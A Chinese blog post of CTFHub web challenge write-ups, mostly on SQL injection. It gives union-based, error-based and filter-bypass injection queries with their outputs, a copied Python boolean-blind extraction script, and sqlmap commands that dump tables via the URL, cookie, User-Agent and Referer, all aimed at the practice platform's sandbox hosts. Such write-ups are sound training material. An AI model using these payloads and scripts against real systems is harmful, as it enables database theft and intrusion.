CTFHub web部分题解

web

SQL注入

整数型注入

select * from news where id=1

ID: 1
Data: ctfhub

select * from news where id=65535 union select 1,database()

ID: 1
Data: sqli

select * from news where id=65535 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

ID: 1
Data: news,flag

select * from news where id=65535 union select 2,group_concat(column_name) from information_schema.columns where table_name="flag"

ID: 2
Data: flag

select * from news where id=65535 union select 1,flag from sqli.flag

ID: 1
Data: ctfhub{b4e5f56292df47714a3505cb8e7db7ec3841564e}

字符型注入

select * from news where id=‘65535‘ union select 1,database()#
ID: 1
Data: sqli

select * from news where id=‘65535‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#‘
ID: 1
Data: news,flag

select * from news where id=‘65535‘ union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#‘
ID: 1
Data: flag

select * from news where id=‘65535‘ union select 1,flag from sqli.flag#‘
ID: 1
Data: ctfhub{55f091a136f1d09a3a47a0199345ec740f1b19bb}

报错注入

select * from news where id=1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry ‘sqli&1‘ for key ‘group_key‘

select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry ‘news&1‘ for key ‘group_key‘

select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry ‘flag&1‘ for key ‘group_key‘

select * from news where id=1 union select count(*),concat((select column_name from information_schema.columns where table_name="flag" limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry ‘flag&1‘ for key ‘group_key‘

select * from news where id=id=1 union select count(*),concat((select flag from sqli.flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
查询错误: Duplicate entry ‘ctfhub{1485dddbf741f771c95612e0c824f68e50e4ebaf}&1‘ for key ‘group_key‘

布尔盲注

https://blog.csdn.net/weixin_44732566/article/details/104417351

抄的脚本

import requests
import time

urlOPEN = ‘http://challenge-ef71d5f8c726bea8.sandbox.ctfhub.com:10080/?id=‘
starOperatorTime = [] 
mark = ‘query_success‘
 
def database_name():
	name = ‘‘
	for j in range(1,9):
		for i in ‘sqcwertyuioplkjhgfdazxvbnm‘:
			url = urlOPEN+‘if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))‘ %(j,i)
			# print(url+‘%23‘)
			r = requests.get(url)
			if mark in r.text:
				name = name+i
				
				print(name)
				
				break
	print(‘database_name:‘,name)
	
		
	
database_name()
 
def table_name():
    list = []
    for k in range(0,4):
        name=‘‘
        for j in range(1,9):
            for i in ‘sqcwertyuioplkjhgfdazxvbnm‘:
                url = urlOPEN+‘if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))‘ %(k,j,i)
			    # print(url+‘%23‘)
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print(‘table_name:‘,list)

#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))

def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=‘‘
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in ‘sqcwertyuioplkjhgfdazxvbnm‘:
                url=urlOPEN+‘if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))‘ %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print (‘column_name:‘,list)

column_name()

def get_data():
        name=‘‘
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+‘if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))‘ %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print (‘value:‘,name)
    
get_data()

时间盲注

https://www.cnblogs.com/0yst3r-2046/p/12486654.html

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 --dbs

available databases [4]:
[*] information_schema [*] mysql
[*] performance_schema [*] sqli

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+

Database: sqli
Table: flag
[1 entry]
+--------------------------------------------------+
| flag |
+--------------------------------------------------+
| ctfhub{1b434bc37227050f91a3c6d89839c3d46caddc27} |
+--------------------------------------------------+

MySQL结构

SQL注入之sqlmap进阶

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 --dbs

available databases [4]:
[*] information_schema [*] mysql
[*] performance_schema [*] sqli

Database: sqli
[2 tables]
+------------+
| news |
| yqoedxnbyv |
+------------+

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -Tyqoedxnbyv --columns

Database: sqli
Table: yqoedxnbyv
[1 column]
+------------+--------------+
| Column | Type |
+------------+--------------+
| xlmnukvowy | varchar(100) |
+------------+--------------+

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns --dump

Database: sqli
Table: yqoedxnbyv
[1 entry]
+--------------------------------------------------+
| xlmnukvowy |
+--------------------------------------------------+
| ctfhub{f1a6d4ca1299a361ac6c24a3467eacad28e33462} |
+--------------------------------------------------+

Cookie注入

https://www.cnblogs.com/0yst3r-2046/p/12493132.html

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" --dbs --level 2

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -D sqli --tables --level 2

Database: sqli
[2 tables]
+------------+
| news       |
| ylhikalyfo |
+------------+

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -T ylhikalyfo --columns --dump --level 2

Database: sqli
Table: ylhikalyfo
[1 entry]
+--------------------------------------------------+
| purywifqom                                       |
+--------------------------------------------------+
| ctfhub{9fdae54dfbd16b2b8e8362efaa630d2e837ae597} |
+--------------------------------------------------+

UA注入

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables

Database: sqli
[2 tables]
+------------+
| news       |
| stjztvvqvb |
+------------+

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -T stjztvvqvb --columns --dump

Database: sqli
Table: stjztvvqvb
[1 entry]
+--------------------------------------------------+
| wckzncyvgh                                       |
+--------------------------------------------------+
| ctfhub{0103df815affd10439bf1ed48520d8f39618e590} |
+--------------------------------------------------+

Refer注入

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables

Database: sqli
[2 tables]
+---------+
| 2ews    |
| hfuiwsi |
+---------+

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm --columns

Database: sqli
Table: hfuiwsiotm
[1 column]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| zuzhumkhnd | varchar(100) |
+------------+--------------+

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm -C  zuzhumkhnd --dump

Database: sqli
Table: hfuiwsiotm
[1 entry]
+--------------------------------------------------+
| zuzhumkhnd                                       |
+--------------------------------------------------+
| ctfhub{d61711c950c746b5cc93caaf5ae33c1dfd2f1cd0} |
+--------------------------------------------------+

过滤空格

https://www.cnblogs.com/anweilx/p/13156216.html

65535/**/union/**/select/**/1,database()ID: 1
Data: sqli

65535/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

ID: 1
Data: zzmpdgadiv,news

65535/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="zzmpdgadiv"

ID: 1
Data: bxphkegikc

65535/**/union/**/select/**/1,bxphkegikc/**/from/**/zzmpdgadiv

ID: 1
Data: ctfhub{93c21f537ae0bd573387788c7c4e1bf71e64d233}

XSS

反射型

参考链接:https://blog.csdn.net/solitudi/article/details/107544165

文件上传

无验证

AntSword 中国蚁剑的下载安装配置(附下载文件)

题解

前端验证

.htaccess

MIME绕过

00截断

双写后缀

文件头检查

RCE

eval执行

文件包含

php://input

读取源代码

远程包含

命令注入 过滤cat 过滤空格

过滤目录分隔符 过滤运算符 综合过滤练习

Bypass disable_function

CTFHub web部分题解

上一篇:oracle创建、删除 数据库、建立表空间以及插入 删除 修改表


下一篇:mysql 表的增删改查 修改表结构